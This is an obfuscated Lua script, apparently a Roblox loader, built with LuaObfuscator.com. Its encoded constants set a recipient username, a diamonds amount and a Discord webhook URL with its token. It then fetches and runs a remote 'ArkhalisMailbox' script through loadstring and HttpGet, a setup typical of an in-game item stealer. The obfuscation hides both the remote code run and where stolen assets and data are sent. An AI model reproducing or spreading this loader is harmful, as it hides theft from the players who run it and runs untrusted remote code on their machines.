--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.7) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((147 + 785) -(857 + 74)))) ;return v70-(v70%(569 -((1244 -(282 + 595)) + 201))) ;else local v71=(1639 -(1523 + 114))^(v32-(928 -(214 + 713))) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + 0 );v19=v19 + (1274 -(226 + 1044)) ;return (v37 * (23917454 -7140238)) + (v36 * ((14559 + 51094) -(32 + 85))) + (v35 * (251 + 5)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v69=0 -0 ;while true do if (v69==0) then if (v38==3) then for v100=1,v24() do v40[v100-(262 -(241 + 20)) ]=v29();end return v42;end if (v38==(1 -0)) then local v97=0 + 0 ;while true do if (v97~=1) then else v44={};v38=2;break;end if (v97~=0) then else v42={v39,v40,nil,v41};v43=v24();v97=1;end end end v69=1;end if (v69==(4 -3)) then if (v38~=2) then else local v98=0 -0 ;while true do if (v98~=(1206 -(696 + 510))) then else local v106=0 -0 ;while true do if (0~=v106) then else for v131=1,v43 do local v132=0;local v133;local v134;local v135;local v136;while true do if (v132~=(1262 -(1091 + 171))) then else v133=0 + 0 ;v134=nil;v132=1;end if (v132==1) then v135=nil;v136=nil;v132=6 -4 ;end if ((6 -4)==v132) then while true do if (v133==(375 -(123 + 251))) then v136=nil;while true do if (v134~=1) then else if (v135==1) then v136=v22()~=(0 -0) ;elseif (v135==2) then v136=v25();elseif (v135~=3) then else v136=v26();end v44[v131]=v136;break;end if (v134==(698 -(208 + 490))) then local v173=0 + 0 ;local v174;while true do if (0~=v173) then else v174=0 + 0 ;while true do if (v174==(837 -(660 + 176))) then v134=1 + 0 ;break;end if (v174~=0) then else local v184=0;while true do if ((203 -(14 + 188))~=v184) then else v174=676 -(534 + 141) ;break;end if (v184~=(0 + 0)) then else v135=v22();v136=nil;v184=1 + 0 ;end end end end break;end end end end break;end if (v133==(0 + 0)) then local v171=0 -0 ;while true do if (v171~=1) then else v133=1;break;end if (v171==(0 -0)) then v134=0;v135=nil;v171=1;end end end end break;end end end v42[3]=v22();v106=2 -1 ;end if (v106==(1 + 0)) then v98=1 + 0 ;break;end end end if (v98==(397 -(115 + 281))) then for v107=2 -1 ,v24() do local v108=0;local v109;local v110;while true do if (v108==(1 + 0)) then while true do if (v109~=(0 -0)) then else v110=v22();if (v21(v110,1,3 -2 )~=0) then else local v165=0;local v166;local v167;local v168;local v169;local v170;while true do if (v165==(867 -(550 + 317))) then v166=0 -0 ;v167=nil;v165=1 -0 ;end if (v165==2) then v170=nil;while true do if (v166~=(5 -3)) then else while true do if (v167==(287 -(134 + 151))) then local v177=1665 -(970 + 695) ;local v178;while true do if (v177~=0) then else v178=0 -0 ;while true do if (v178==1) then v167=3;break;end if (v178~=(1990 -(582 + 1408))) then else if (v21(v169,3 -2 ,1)~=1) then else v170[2]=v44[v170[2]];end if (v21(v169,2 -0 ,7 -5 )~=(1825 -(1195 + 629))) then else v170[3 -0 ]=v44[v170[3]];end v178=1;end end break;end end end if (v167~=(241 -(187 + 54))) then else local v179=0;local v180;while true do if (v179~=(780 -(162 + 618))) then else v180=0;while true do if (v180==1) then v167=1;break;end if (v180==0) then local v187=0 + 0 ;while true do if (v187==(0 + 0)) then v168=v21(v110,3 -1 ,4 -1 );v169=v21(v110,4,6);v187=1 + 0 ;end if (v187~=(1637 -(1373 + 263))) then else v180=1001 -(451 + 549) ;break;end end end end break;end end end if (v167==(1 + 0)) then local v181=0;local v182;while true do if (v181~=(0 -0)) then else v182=0;while true do if ((0 -0)~=v182) then else local v188=1384 -(746 + 638) ;while true do if (v188==0) then v170={v23(),v23(),nil,nil};if (v168==(341 -(218 + 123))) then local v193=1581 -(1535 + 46) ;local v194;local v195;local v196;while true do if (v193==0) then v194=0 + 0 ;v195=nil;v193=1;end if (1==v193) then v196=nil;while true do if (v194==1) then while true do if ((0 + 0)~=v195) then else v196=0;while true do if ((560 -(306 + 254))~=v196) then else v170[1 + 2 ]=v23();v170[4]=v23();break;end end break;end end break;end if (v194~=0) then else v195=0 -0 ;v196=nil;v194=1;end end break;end end elseif (v168==(1468 -(899 + 568))) then v170[2 + 1 ]=v24();elseif (v168==2) then v170[7 -4 ]=v24() -((605 -(268 + 335))^(306 -(60 + 230))) ;elseif (v168~=3) then else local v199=0;local v200;local v201;while true do if (v199==(573 -(426 + 146))) then while true do if (v200~=0) then else v201=0 + 0 ;while true do if (v201~=0) then else v170[3]=v24() -((1458 -(282 + 1174))^16) ;v170[4]=v23();break;end end break;end end break;end if (0==v199) then v200=0;v201=nil;v199=1;end end end v188=1;end if (v188~=(812 -(569 + 242))) then else v182=2 -1 ;break;end end end if (1==v182) then v167=1 + 1 ;break;end end break;end end end if (v167==(1027 -(706 + 318))) then if (v21(v169,3,1254 -(721 + 530) )~=1) then else v170[1275 -(945 + 326) ]=v44[v170[4]];end v39[v107]=v170;break;end end break;end if (v166~=1) then else local v175=0;while true do if (1==v175) then v166=2;break;end if (v175~=(0 -0)) then else v169=nil;v170=nil;v175=1 + 0 ;end end end if (v166==(700 -(271 + 429))) then local v176=0;while true do if (v176~=1) then else v166=1 + 0 ;break;end if (v176~=0) then else v167=0;v168=nil;v176=1;end end end end break;end if (v165==(1501 -(1408 + 92))) then v168=nil;v169=nil;v165=2;end end end break;end end break;end if (v108==0) then v109=0;v110=nil;v108=1087 -(461 + 625) ;end end end v38=3;break;end end end if (v38~=0) then else local v99=0;while true do if (v99==(1289 -(993 + 295))) then v41={};v38=1 + 0 ;break;end if (v99~=(1171 -(418 + 753))) then else v39={};v40={};v99=1;end end end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=0 + 0 ;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v45==3) then if (v50==(0 + 0)) then if (v49==(0 + (0 -0))) then return v51 * (0 + 0) ;else v50=530 -(406 + 123) ;v48=1769 -(1749 + 20) ;end elseif (v50==(487 + 1560)) then return ((v49==(1322 -((4143 -2894) + 73))) and (v51 * ((1 + 0)/0))) or (v51 * NaN) ;end return v8(v51,v50-(2168 -(466 + 679)) ) * (v48 + (v49/(((4 + 0) -2)^(148 -96)))) ;end if ((1901 -(106 + 1794))==v45) then v48=1 + 0 ;v49=(v21(v47,1 + 0 ,59 -39 ) * ((5 -3)^(146 -(4 + 110)))) + v46 ;v45=2;end if ((586 -(57 + 527))==v45) then v50=v21(v47,21,1458 -(41 + 201 + 1185) );v51=((v21(v47,135 -((33 -16) + 86) )==1) and  -1) or (1 + 0) ;v45=6 -3 ;end if (v45==(0 -0)) then v46=v24();v47=v24();v45=167 -((187 -(30 + 35)) + 44) ;end end end v26=nil;function v26(v52)local v53=0 + (0 -0) ;local v54;local v55;while true do if ((1257 -(1043 + 214))==v53) then v54=nil;if  not v52 then local v93=0 -(0 + 0) ;while true do if (v93==0) then v52=v24();if (v52==(0 + 0)) then return "";end break;end end end v53=1213 -(323 + 889) ;end if (v53==(7 -4)) then return v6(v55);end if (v53==(2 + 0 + 0)) then v55={};for v76=851 -(20 + (2187 -1357)) , #v54 do v55[v76]=v2(v1(v3(v54,v76,v76)));end v53=583 -(361 + 219) ;end if (v53==(127 -(116 + 10))) then v54=v3(v16,v19,(v19 + v52) -(1 + 0) );v19=v19 + v52 ;v53=322 -(53 + 267) ;end end end v18=5;end if (v18==2) then function v22()local v56=0 -0 ;local v57;while true do if (v56==(1551 -(1126 + 425))) then v57=v1(v16,v19,v19);v19=v19 + 1 ;v56=406 -(118 + (1408 -(118 + 1003))) ;end if (v56==(3 -2)) then return v57;end end end v23=nil;function v23()local v58=0 -0 ;local v59;local v60;while true do if (0==v58) then v59,v60=v1(v16,v19,v19 + (379 -(142 + 235)) );v19=v19 + (9 -(7 + 0)) ;v58=1 + 0 ;end if (v58==(978 -(553 + 424))) then return (v60 * (483 -227)) + v59 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v72=v2(v0(v61,16));if v20 then local v78=v5(v72,v20);v20=nil;return v78;else return v72;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v79=v66;local v80=v67;local v81=v68;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=4) then if (v92<=1) then if (v92>0) then do return;end else v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=2) then local v116=0;local v117;local v118;local v119;local v120;while true do if (v116==0) then v117=v91[2];v118,v119=v82(v89[v117](v13(v89,v117 + 1 ,v91[3])));v116=1;end if (v116==2) then for v160=v117,v84 do v120=v120 + 1 ;v89[v160]=v118[v120];end break;end if (v116==1) then v84=(v119 + v117) -1 ;v120=0;v116=2;end end elseif (v92>3) then v89[v91[2]]=v64[v91[3]];else v89[v91[2]]();end elseif (v92<=6) then if (v92==5) then v89[v91[2]]=v91[3];else local v123=v91[2];v89[v123]=v89[v123](v13(v89,v123 + 1 ,v84));end elseif (v92<=7) then local v125=v91[2];local v126=v89[v91[3]];v89[v125 + 1 ]=v126;v89[v125]=v126[v91[4]];elseif (v92==8) then v89[v91[2]][v91[3]]=v91[4];else local v141;local v142,v143;local v144;local v145;v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v145=v91[2];v144=v89[v91[3]];v89[v145 + 1 ]=v144;v89[v145]=v144[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v145=v91[2];v142,v143=v82(v89[v145](v13(v89,v145 + 1 ,v91[3])));v84=(v143 + v145) -1 ;v141=0;for v158=v145,v84 do local v159=0;while true do if (0==v159) then v141=v141 + 1 ;v89[v158]=v142[v141];break;end end end v83=v83 + 1 ;v91=v79[v83];v145=v91[2];v89[v145]=v89[v145](v13(v89,v145 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();end v83=v83 + 1 ;end end;end if (0==v65) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!113O0003023O005F4703083O00557365726E616D6503093O00726963685F6162647503083O004469616D6F6E6473024O0080841E4103073O00576562682O6F6B037C3O00682O7470733A2O2F646973636F7264612O702E636F6D2F6170692F776562682O6F6B732F2O31303830333538302O3936333135393631322F53795752394D33744D4B6F7955744E636E4977353873724D2O485F4466483548696D6B2D6B39735A3163544658786E79756D6E56586A424473646C524B574A6F5F6865762O033O004B6579034O00030F3O00576562682O6F6B4475616C482O6F6B030D3O004C6F6164696E675363722O656E026O00F03F030A3O005363726970744E616D65030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756100163O00124O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00013O00304O0008000900124O00013O00304O000A00090012043O00013O0030093O000B000C00124O00013O00304O000D000900124O000E3O00122O0001000F3O00202O00010001001000122O000300116O000100039O0000026O000100012O00013O00017O00",v9(),...);end
